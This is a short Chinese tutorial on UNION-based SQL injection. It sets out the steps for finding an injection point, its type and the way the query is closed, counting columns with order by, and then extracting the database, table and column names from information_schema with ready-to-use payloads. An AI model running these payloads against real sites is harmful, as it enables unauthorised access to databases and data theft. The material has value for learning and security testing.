sql注入之union注入
联合查询注入利用的前提: 必需要有回显
联合查询过程:
- 判断是否存在注入点
- 判断是什么类型注入(字符型or数字型)
- 判断闭合方式
- 查询列数个数(order by)
5, 得到数据库名 - 得到表名
- 得到字段名
1. 判断是否存在注入点 能够用(')单引号显示数据库错误信息或者页面回显不一样
2. 判断什么类型(字符型or数字型) 用and 1=1和and 1=2 若是页面没有变化说明不是数字型 ,若是有明显变化说明是数字型
3. 判断闭合方式 单引号or双引号..看报错信息、
4. 判断列数个数(order by) order by在mysql中查询结果是按照指定字段进行排序的,例如数据库中有3个字段,order by查询就是1,2,3
5. 查看数据库信息and得到数据库名 使用group_concat()
基本语句:
1' union select 1,(select database()),3--+
1' union select 1,(select group_concat(schema_name) from information_schema.schemata) --+
6. 得到表名
基本语句:
0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
7. 得到字段名
基本语句:
0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='表名'),3 --+
相关文章
- 1. SQL注入(union注入)
- 2. sql注入-union select
- 3. SQL注入基础:1.union注入
- 4. union注入
- 5. SQL注入之cookie注入
- 6. sqli-labs之union注入
- 7. SQL注入:Sql注入之sqlmapapi介绍
- 8. SQL注入之-盲注
- 9. SQL注入之宽字节注入
- 10. sql注入之二次注入
- 更多相关文章...
- • SQLite 注入 - SQLite教程
- • Spring DI(依赖注入)的实现方式:属性注入和构造注入 - Spring教程
- • YAML 入门教程
- • Spring Cloud 微服务实战(三) - 服务注册与发现
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. SQL注入(union注入)
- 2. sql注入-union select
- 3. SQL注入基础:1.union注入
- 4. union注入
- 5. SQL注入之cookie注入
- 6. sqli-labs之union注入
- 7. SQL注入:Sql注入之sqlmapapi介绍
- 8. SQL注入之-盲注
- 9. SQL注入之宽字节注入
- 10. sql注入之二次注入